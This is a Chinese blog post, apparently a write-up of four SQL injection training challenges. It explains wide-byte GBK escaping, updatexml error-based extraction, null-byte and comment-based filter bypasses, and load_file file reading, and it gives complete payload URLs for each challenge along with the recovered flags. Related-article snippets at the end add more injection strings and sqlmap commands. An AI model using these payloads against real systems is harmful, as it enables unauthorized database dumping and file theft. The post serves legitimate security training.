mysql注入测试多句_Writeup for sql注入靶机测试

最新推荐文章于 2022-11-22 13:19:20 发布
最新推荐文章于 2022-11-22 13:19:20 发布
阅读量144 收藏
点赞数
文章标签: mysql注入测试多句
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33281940/article/details/113460614
版权

2ff34e647e2e3cdfd8dca593e17d9b0a.png

—For sql注入靶机测试

>>SQL注入分类UNION query SQL injection(可联合查询注入)

Boolean-based blind SQL injection(布尔型注入)

Error-based SQL injection(报错型注入)

Stacked queries SQL injection(可多语句查询注入)

Time-based blind SQL injection(基于时间延迟注入)

>>SQL注入利用手法

UNION query SQL injection(可联合查询注入)

​ 要求网站没有过滤关键字 没有转义 有显示位

Error-based SQL injection(报错型注入)

​ 需要脚本输出 sql错误信息

Boolean-based blind SQL injection(布尔型注入)

​ 工作量大 需要时间

Stacked queries SQL injection(可多语句查询注入)

​ 有的数据库不支持

Time-based blind SQL injection(基于时间延迟注入)

​ 可以在条件很苛刻的情况下注入(无报错,无显示位),但非常费时间。

sql-1(103.238.227.13:10083)1-http://103.238.227.13:10083/?id=-1%df' UNION SELECT 1,database() --+

2-http://103.238.227.13:10083/?id=-1%df' UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

3-http://103.238.227.13:10083/?id=-1%df' UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=char(107,101,121) --+

4.http://103.238.227.13:10083/?id=-1%df' UNION SELECT 1,group_concat(string) from .key group by id --+

013535527.png

013621013.png

id=1后加‘没有报错,应该是加了将其转义了。宽字节注入是利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围)。如果我们输入%df’看会怎样:我们可以看到,已经报错了。我们看到报错,说明sql语句出错,看到出错说明可以注入了。

为什么从刚才到现在,只是在’也就是%27前面加了一个%df就报错了?而且从图中可以看到,报错的原因就是多了一个单引号,而单引号前面的反斜杠不见了。

这就是mysql的特性,因为gbk是多字节编码,他认为两个字节代表一个汉字,所以%df和后面的也就是%5c变成了一个汉字“運”,而’逃逸了出来。

014329429.png

​ 找到注入点了,order by 试出有2个字段。

​ union 查询爆数据库。以为可以一套出,结果。它。报。错。了。

014712950.png

​ 然后再加上注释符。这样可以注释掉后面的sql语句,然后让其只执行攻击语句而达到目的。

​ 继续。查询数据库。

151814239.png

​ 得到sql5的库,继续,查表。

151951812.png

​ 快好了,马上就好了。再查询key表的字段。

180547109.png

​ 注意到表名用了ascii码,因为用’key’时''被转义了。

​ 最后从key表查询,这里查询时key表直接输入有问题,试了试其他字符都可以,应该是有过滤。

160042687.png

​ 这里不断的试,发现有一个点来连接,高涵表哥发现.key可以执行。

160200325.png

​ 这里`key`也可以绕过。

​ 最后。

181034762.png

​ aaaaaaaaaa

sql-2(103.238.227.13:10084)http://103.238.227.13:10084/?id=-1+anD Updatexml(1,concat(0x7e,(SELEcT @@veRsion),0x7e),1) --+

​ updatexml的爆错原因是updatexml第二个参数需要的是Xpath格式的字符串。我们输入的显然不符合。故报错由此报错。

​ 但updatexml的最大长度是32位的,所以有所局限(PS:但是应对大多的已经足够。)

181525952.png

​ 数据库版本:5.5.48-log

sql-3(103.238.227.13:10087)http://103.238.227.13:10087/?id=1 u%00nion sel%00ect GROUP_CONCAT(hash),1 fr%00om .key --+

​ 提示给出了部分源码,可以看出对这么多查询语句都进行了过滤,而求大小写也不管用,会转换后比对。

​ %00 php和mysql对于其的处理不同,PHP会对其进行解码,而mysql会忽略,这样既绕过了过滤,又不影响sql语句的执行。

​ 步骤和第一个差不多,直接查询就好。

​ 这里查询时key表直接输入有问题,试了试其他字符都可以,应该是有过滤。

155449465.png

​ 同1

185603966.png

​ 返回1~c3d3c17b4ca7f791f85e#$1cc72af274af4adef

sql-4(103.238.227.13:10088)

​ 限制了空格,可以利用注释/**/代替空格,也可以用%0.

​ 暴错注入,之前updatexml函数报错注入可以,这里也利用的updatexml()函数暴错,ExtractValue()也可以,返回的数据同样有限,最长32位,但可以分批次提取。http://103.238.227.13:10088/?id=-1/**/and/**/updatexml(1,concat(0x7e,(SELECT@@version),0x7e),1)

163203172.pnghttp://103.238.227.13:10088/?id=-1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/load_file(0x2f7661722f746573742f6b65795f312e706870)),0x7e),1)

163503756.pnghttp://103.238.227.13:10088/?id=1%0aand%0aupdatexml(1,concat(0x7e,(select%0a(substring(load_file(0x2f7661722f746573742f6b65795f312e706870),64,32))),0x7e),1)http://103.238.227.13:10088/?id=1%0aand%0aupdatexml(1,concat(0x7e,(select%0a(substring(load_file(0x2f7661722f746573742f6b65795f312e706870),95,32))),0x7e),1)

​ 分2次读取再拼接。

163757467.png

163850106.png

得到Flag:”7249f5a7fd1de602b30e6f39aea6193a”

体制内生存之道
关注
[网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
杨秀璋的专栏
03-24 6670
前文带领大家搭建一个Oracle+phpStudy本地网络渗透靶场,并应用SQL注入、XSS攻击、文件上传漏洞三个场景。这篇文章将跟着Cream老师兼好友学习,结合自己的经验详细介绍Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。注入漏洞是安全威胁中比较常见的漏洞,Oracle也是用得最广的数据库,希望这篇文章对您有帮助。真心觉得Cream老师讲解非常厉害,且看且珍惜。
HTB HARD 靶机 Cerberus WriteUp
最新发布
qq_58869808的博客
03-26 8203
HTB Cerberus hard!!!靶机writeUp
MySQL 手工注入常用语句
热门推荐
龙哥盟
03-02 4万+
判断是否存在SQL注入' and 1=1 and 1=2暴字段长度Order by 数字匹配字段and 1=1 union select 1,2,..,n暴字段位置and 1=2 union select 1,2,..,n利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select ve
mysql注入多语句执行_PHP+MySQL多语句执行
weixin_33647940的博客
01-18 223
发起这个帖子,估计就很多人看到题目就表示不屑了。一直以来PHP+MySQL环境下,无论是写程序或者是注入攻击,是无法多语句执行的,这么广为人知的常识,没理由会有人不知道。可权威就是用来被挑战的,常识也就是为了被打破的。如果没有一点创新性,追根到底的求知欲,一直在条条框框里挣扎,那还有什么争取自由、解析世界的Hacker,Geek精神?最近在wooyun上看到一个很简单的sql注入案例,虽然漏洞很简...
如果能够注入多条mysql语句--绕过大部分关键词
q1415500189的博客
01-22 2609
绕过
黄聪:SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码...
weixin_34259159的博客
07-16 143
检查漏洞 1' or 1=1  or ('1' = '11' or 1=1)  or '1' = '11' or 1=1 or '1' = '11'/**/or/**/1=1/**/or/**/'1'= '1猜表名1' or 0<(select count(*) from admin) and '1' = '11'/**/or/**/0<(select/**/count(*)/**/...
【PTE】承制科技培训SQL注入题目writeup
HkD01L的博客
11-22 819
承制科技的pte培训课程提供的靶场,sql注入题目writeup
ctf线下赛mysql密码_CTF线下赛writeup&tinyblog代码审计
weixin_33982454的博客
02-01 401
前段时间参加了某次CTF线下赛,大多数比赛都是采用主流CMS系统,比如wordpress、pgpcms、dedecms等等,如果对主流CMS漏洞比较熟悉的话可以迅速定位漏洞,发起攻击。而这次比赛采用了小众自写CMS的方式,注重现场快速代码审计。本文将介绍CTF线下赛AWD模式的一些常见套路,以及对tinyblog的代码审计思路。预留后门比赛开始,一般比赛方为了比赛的观赏性,一般都会预留后门,这样场...
【VulnHub靶机渗透】三:Billu_b0x
野原新之助
04-06 1079
靶机设定了一些常见的Web应用漏洞,如文件包含、任意文件下载、注入等。 (VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成。)
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
万字sql注入学习过程--------从一个查询语句到SQL注入原理——包含各种注入姿势及相关CTF,靶场,漏洞实战 随时补充内容
AAAAAAAAAAAA66的博客
11-30 2639
从第一次接触到SQL注入到现在已经有小半年了,简单打了个DVWA靶场之后便没怎么用手工注入,非常依赖工具,最近遇到几道需要手动注入的CTF题目,发现自己对sql注入的原理只是停留在一个基础的理论之上,所以就写这一篇文章对自己的sql注入进行新的梳理。 ——————————————————————————————————————————— 开始介绍sql注入漏洞之前,先介绍一个基础的mysql查询语句(学过数据库的同学直接跳走) 我们经常遇到一个这样的需要我们输入的表格 我们在这输入一个 1 .
mysql 注入 爆表_墨者学院 – SQL注入实战-MySQLWriteup
weixin_34847099的博客
02-01 219
两种解法一、利用sqlmap及其tamper模块base64encode使用1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为12.查看当前的系统信息sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode3.暴库sqlmap -u "http://219.153.49...
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现
ADummy的博客
02-23 874
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>信息被爆出 0x01漏洞介绍 ​ Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 影响版本 Drupal < 7.31 0x02漏洞复现 payload: POST /?q=node&destinati
注入漏洞-sql注入
一个很酷的人
04-30 4万+
注入漏洞 注入漏洞 1 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。 1.1 SQL注入的...
web渗透测试----26、SQL注入漏洞--(2)SQL注入漏洞的挖掘(白盒)
七天
09-06 1499
SQL注入漏洞白盒挖掘方法
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 漏洞复现
ADummy的博客
02-24 783
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包—>脚本生成poc—>Burpsuite修改referer字段—>有回显 0x01漏洞介绍 ​ ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0
web攻防实战writeup;sqlmap使用&sql注入&敏感文件扫描&SSFR漏洞BurpSuite使用
CHERRY_cong的博客
05-15 522
web攻防实战writeup;sql注入&敏感文件扫描&SSFR漏洞BurpSuite使用 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录web攻防实战writeup;sql注入&敏感文件扫描&SSFR漏洞BurpSuite使用step1:扫描数据库step2:列出数据库的表step3:将表中数据输出step4: sql命令注入web2step1 敏感文件扫描step2 恢复文件查看源码step3 上传webshellweb3step1:确定发送
mysql 注入用例_SQL注入漏洞安全测试(WVS/POST型/手工SQL注入)
weixin_32667439的博客
01-19 849
1、WVS自动化SQL注入测试n 测试目的:测试网站是否存在SQL注入漏洞。n 测试用例:1) Scansettings选择sql injection策略;2) 输入扫描网站URL,一直下一步(如果需要登陆点击New Login Sqquence);3) 如果扫描结果如下显示,则网站不通过;5) 针对get形式url中存在多个参数,可以通过-p选项指定。2、W...
sql 注入实战
终日而思不如须臾所学。
11-30 1973
直接开整 // 后端接口 // get my all todos router.post("/api/todo/list", (req, res) => { let { _openid = 'kong', } = { ...req.body } console.log(_openid) const sql = ` select * from todo_today where _openid = '${_openid}' ` sqlQuery(sql,
HFCTF Writeup:MySQL盲注与Nginx缓存文件Include
HFCTF-江苏翔信二队Writeup1是关于CTF竞赛的一篇writeup文章,涉及到mysql、bash、nginx等多个技术领域。下面是从该文章中提炼出的知识点: **MySQL** * MySQL 8.x版本中,regexp不能用于时间盲注,这可能是由于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值